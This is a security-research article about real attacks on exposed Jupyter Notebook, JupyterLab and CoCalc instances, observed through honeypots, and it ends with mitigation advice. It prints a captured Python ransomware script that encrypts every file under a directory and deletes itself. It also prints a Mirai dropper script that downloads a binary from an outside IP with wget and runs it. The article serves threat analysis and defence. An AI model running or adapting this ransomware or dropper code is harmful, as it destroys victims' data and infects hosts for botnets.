Real-World Cyberattacks Targeting Data Science Tools
Aqua Nautilus researchers explore how to protect Jupyter Notebook and other popular data science tools against crypto mining and ransomware attacks.
Join the DZone community and get the full member experience.
Join For FreeAs the move to the cloud accelerates, organizations increasingly rely on large data teams to make data-driven business decisions. To accomplish their jobs, data professionals work with dedicated tools that are often deployed to development and production environments and are frequently given high privileges. Threat actors are innovators, constantly looking for new ways to penetrate organizations, and the expanded attack surface data science tools present is a prime opportunity.
In order to identify currently existing threats and help organizations improve their security posture, Aqua Nautilus extensively researched the threats targeting cloud data science tools. We found that many data tools are exposed to threats and are being actively attacked in the wild. In this article, we’ll detail the attacks on Jupyter Notebooks and other popular open-source tools that data practitioners use to analyze and manipulate data.
Exploring Data Science Tools
Data practitioners collect, manipulate, and analyze a company’s data to guide and empower the business with actionable insights. They require high-privileged access to the company’s databases and computing resources, making them a tempting target for threat actors. Additionally, they require an array of programming languages, frameworks, and tools to accomplish the wide range of tasks they perform with data. These tools include Jupyter Notebook, Apache Spark, Hadoop, Airflow DAG, Redis, MySQL, and more. The more tools an organization uses, the more vulnerable it can become, opening the door to more potential attacks.
Identifying Jupyter Notebook Attacks
Jupyter Notebook, an open-source web application, is a popular and frequently attacked tool. Data professionals use Jupyter Notebook to work with data, write and execute code, and visualize the results. Team Nautilus researchers found 70 completely unsecured Jupyter Notebook instances through a Shodan query out of a total of 10,000 that were visible and accessible.
Normally, access to the online application should be restricted, either with a token or password or by limiting ingress traffic. However, sometimes Jupyter Notebooks are left exposed to the internet with no authentication configured, allowing anyone to easily access the instance via a web browser. On top of this, a built-in feature of Jupyter Notebooks enables the user to open a shell terminal with further access to the server. While this is convenient for users when left unsecured, it allows threat actors enormous leeway. Once their IP address and port were put in our browser, the unsecured Jupyter Notebook instances allowed full visibility and control over the host. Anyone could see the files in the active directory or download files from a remote source.
The majority of the attacks gained initial access via misconfigured environments. After gaining access, adversaries attempted to achieve persistence by creating a new user in the Jupyter Notebook or by adding Secure Shell (SSH) keys. Then, most of the attacks executed a cryptominer, trying to leverage their access for a quick payday. One of the most noteworthy attacks we discovered, however, utilized Python to launch a ransomware attack targeting Jupyter Notebook.
Jupyter Notebook Python Ransomware Attack Dissected
During our research, we consistently observed the attackers gaining initial access via misconfigured environments, then running a ransomware script that encrypts every file on a given path on the server and deletes itself after execution to conceal the attack. Since Jupyter Notebooks are used to analyze data and build data models, this attack can lead to significant damage within organizations if these environments aren’t properly backed up.
Initially, we set up a honeypot with a Jupyter Notebook application exposed to the internet. This attracted a lot of nefarious attention. Here is the kill chain of the attacks we observed:
Per the diagram, the attacker accessed the server via a misconfigured application, downloaded the libraries and tools that support the attack (such as encryptors), and then manually created a ransomware script by pasting the Python code and executing the script. Here’s the code that was executed during the attack on our honeypot:
sud
su
cd /h
ls -la
nano
apt install nano
nano cpt.py
import os
import sys
direct = input("Input directory")
password = input("Input password")
def crypt(file):
import pyAesCrypt
print("---------------------------------------------------------------")
password = str(password)
buffer_size = 512*1024
pyAesCrypt.encryptFile(str(file), str(file) + ".crp", password, buffer_size)
print("[Encrypt] '"+str(file)+".crp'")
os.remove(file)
def walk(dir):
for name in os.listdir(dir):
path = os.path.join(dir, name)
try:
if os.path.isfile(path):
crypt(path)
else:
walk(path)
except Exception as e:
print(f'[-] {e}')
walk(direct)
print("---------------------------------------------------------------")
os.remove(str(sys.argv[0]))<0x1b>[201~<0x18>y
python3 c
/src/
a70e9776-1ca5-4b45-aba5-5949f2bfb642
pip3 install pyAesCrypt
/src/
ls -l
The honeypot was designed to simulate a real-life enterprise environment, so it included actual Jupyter Notebooks and raw data files that the attacker could encrypt. The attack stopped before it could cause more damage, so we decided to simulate and investigate the attack in our lab. In the screenshot below, you can see the execution of the encryptor. Note that the Python file (cpt.py) was designed to delete itself after execution to conceal the attack.
No ransom note was presented in this attack. Thus, we assume that either the adversary was experimenting with the attack on our machine or the honeypot timed out before the attack was completed.
Overall, this attack is simple and straightforward, as opposed to more sophisticated ransomware that uses advanced techniques, such as Locky, Ryuk, WannaCry, or ransomware-as-a-service, such as GandCrab. GandCrab, for instance, is spread via malicious attachments in emails or malicious sites. A downloader is downloaded and fetches the malware from various servers across a wide network. The malware is using some defense evasion techniques, such as packing the files and using encryptors and obfuscators to conceal the code. It gains persistence by copying itself to various locations.
Locky ransomware is disseminated via many infection methods such as Microsoft Office documents (.xlsx, .xls, .pptx, .ppt, .doc, .docx, etc.), JavaScript files, Visual Basic for Application files (.vba), or executables (.exe, .dll). This leads to a greater attack surface and a far greater potential impact.
Ransomware as a Service (RaaS), or Ransomware for Hire, is a business model between ransomware “service providers” and the “customers.” The service providers maintain the infrastructure. The customer purchases this service through dark web channels and pays to disseminate and infect victims. The customers “earn” the money from the victims while the “service providers” provide the infrastructure and earn from renting it.
We also suspect our attacker may be a known entity due to the unique trademark that was used. At the beginning of the attack, the adversary checked if the server was vulnerable by downloading a text file named f1gl6i6z to the /tmp directory. This file contains the word ‘bl*t,’ which might indicate that the threat actor has a Russian origin. We’ve seen this file used before in many cryptomining attacks that target Jupyter Notebooks and JupyterLab environments.
A quick Shodan query shows that there are about 200 internet-facing Jupyter Notebooks with no authentication. Naturally, some of them can be honeypots, but not all. We think that this attack indicates the existence of a broader campaign designed to execute ransomware on these servers.
We used Aqua’s open-source runtime security and forensics tool Tracee to detect two drift events during the attack: dropping and execution on the fly of a binary and a Python file. Although a “living off the land” approach — using the existing tools in a target environment — is common, attackers often prefer to bring in and apply their own tools, and Tracee is capable of detecting these kinds of events. In this case, the attacker downloaded a nano binary to create the file cpt.py and executed this binary along with the cpt.py script. However, these specific detections aren’t available in the open-source Tracee rules.
Further Attacks on Jupyter Notebook
The ransomware attack was far from the only attack our Jupyter Notebook honeypots observed. One, quite strikingly, was a cryptomining botnet attack tied to TeamTNT. Despite being allegedly retired as a group, their legacy lives on with highly sophisticated self-propagating attacks. Also, Aqua Nautilus recently identified their fingerprints on a new malware campaign, including one attack capable of analyzing hardware architecture to optimize cryptomining attacks and another utilizing recent advances in math to attempt to reverse dual elliptic curve encryption.
Since cloud data science tools often have substantial processing power and can be poorly integrated into the security stack, cryptomining attacks intended to turn that processing power into easily exchangeable currencies were common. Many of these attacks were simple and straightforward, with attackers doing nothing more than accessing the terminal manually, downloading a cryptominer and configurations, and launching a mining process. Due to their simplicity, these attacks could be launched very rapidly and with minimal commands.
We also saw attacks in which the attackers added a secret into the “nbsignatures” table. This means that even if the user adds a signature, the attacker will still have access using their own credentials and can return to replicate the attack.
Some of the Jupyter Notebook attacks involved advanced tools, such as Cobalt Strike. Cobalt Strike is a powerful commercial offensive security tool, originally developed for ethical hacking and used by in-house red teams. This, unfortunately, means that it has become highly popular with cybercriminals. The framework offers many useful tools aimed at conducting network attacks, social engineering, and binary and code on-the-fly deployment mechanisms. Cobalt Strike can be used by attackers to gain backdoor access, explore the server, get root privileges, and more.
In the Cobalt Strike attack that Aqua Nautilus detected, the attacker accessed the server via Jupyter Notebook and downloaded the file CrossC2-test, a small payload containing malware with backdoor capabilities that is hard to trace and detect. In addition, another binary file was downloaded to /tmp, a packed Cobalt Strike payload (MD5= d9c9c6777932a6c627a9dd34e1932efb).
In another attack, we spotted an attempt to exploit two recent vulnerabilities for privilege escalation. By compromising an exposed Jupyter Notebook, the attackers gained access to the server and actively attempted to elevate the privileges to root. Then, they used exploits from GitHub to take advantage of the sudoedit vulnerability (CVE-2021-3165) and the Dirty Pipe vulnerability (CVE-2022-0847). We’ve seen attackers seek root privileges on the server to achieve more control over the target environment and expand the blast radius of an attack. To the best of our knowledge, this was the first-ever exploitation of the Dirty Pipe vulnerability seen in the wild.
Other Discoveries of Attacks on Data Science Tools
According to our findings, Jupyter Notebook isn’t the only data science tool that is at risk. JupyterLab and CoCalc were also part of Aqua Nautilus’ research.
JupyterLab is a web-based interactive development environment for notebooks, code, and data. It provides access to the Linux terminal and Jupyter Notebook. We queried Shodan and found more than 70 JupyterLab instances exposed to the internet. Most of them didn’t require any authentication and were already infected with malware. We created several honeypots that allowed access to JupyterLab instances and saw several attacks in the wild.
One simple attack created a Jupyter Notebook with the script named spam.ipnyb on the JupyterLab platform, downloaded the xmrig cryptominer from GitHub, and executed it on the instance. In the screenshot below, you can see two attacks. In one of them, an attacker manually accessed the terminal and downloaded the Python2.7 and 1.json files, which are an xmrig cryptominer and its configuration file.
The second attack is a Mirai malware attack. The file whoareyou.x86 contains the Mirai malware, designed to launch a distributed denial of service (DDoS) attack. Attackers used the following script to download and execute Mirai:
pkill -9 x86;
pkill -9 whoareyou.x86 ;
pkill -9 hakai.x86_64;
cd /tmp;
rm -rf hoho.x86;
pkill x86;
wget http://85.202.269.102/webos/whoareyou.x86;
chmod 777 *;
.whoareyou.x86 server.sploit\
CoCalc is an online collaborative workspace for math and research that offers data science and scientific Python stack, including Jupyter Notebook, R Statistics, and Octave. It also offers a web-based Linux terminal and X11 graphical desktop. A commercial version of CoCalc offers hosting and support, and an open-source version can be downloaded from GitHub.
By querying Shodan, we saw 66 CoCalc instances exposed to the network, 10 of which were completely exposed and allowed unauthenticated access.
Some of these instances allowed attackers to create an account or anonymously log into an existing account and open a Linux terminal. The privileges were limited, but an attacker might exploit this platform to escalate the privileges and gain further access to the host. However, we haven’t seen any active attacks targeting any of these hosts. Attackers may be less familiar with this platform or less keen to exploit it.
Tips for Detection and Mitigation
Now that we’ve laid out the attacks, here are key recommendations for organizations to follow in order to detect and mitigate data science tool threats.
- Use tokens or another authentication method to control access to data tools.
- Limit inbound traffic to the application by blocking the internet access completely or, if the environment requires internet access, by using network rules or VPN to control inbound traffic. Limiting outbound access is also recommended.
- Run applications with a non-privileged user or one with limited access.
- Ensure that all the Jupyter Notebook users are known. You can query the users in the SQLite3 database, which should be found in this path: ./root/.local/share/jupyter/nbsignatures.db
We also recommend looking for SSH authorized keys files to find any unknown users or keys. - Monitor the running processes on the host to detect suspicious processes or cryptominers that hijack resources, which will show up in a high CPU or bandwidth usage. Specific process names, such as xmr and xmrig can also help you identify cryptominers. Both of these real-world examples are named after the XMR, the abbreviation for the Monero cryptocurrency.
While you can manually check every process you have running, it’s an enormous time sink for IT teams and isn’t scalable. Instead, we recommend that you monitor events on the host using a runtime security and forensics tool for Linux, built to address common Linux security issues for the best business results.
Opinions expressed by DZone contributors are their own.
Comments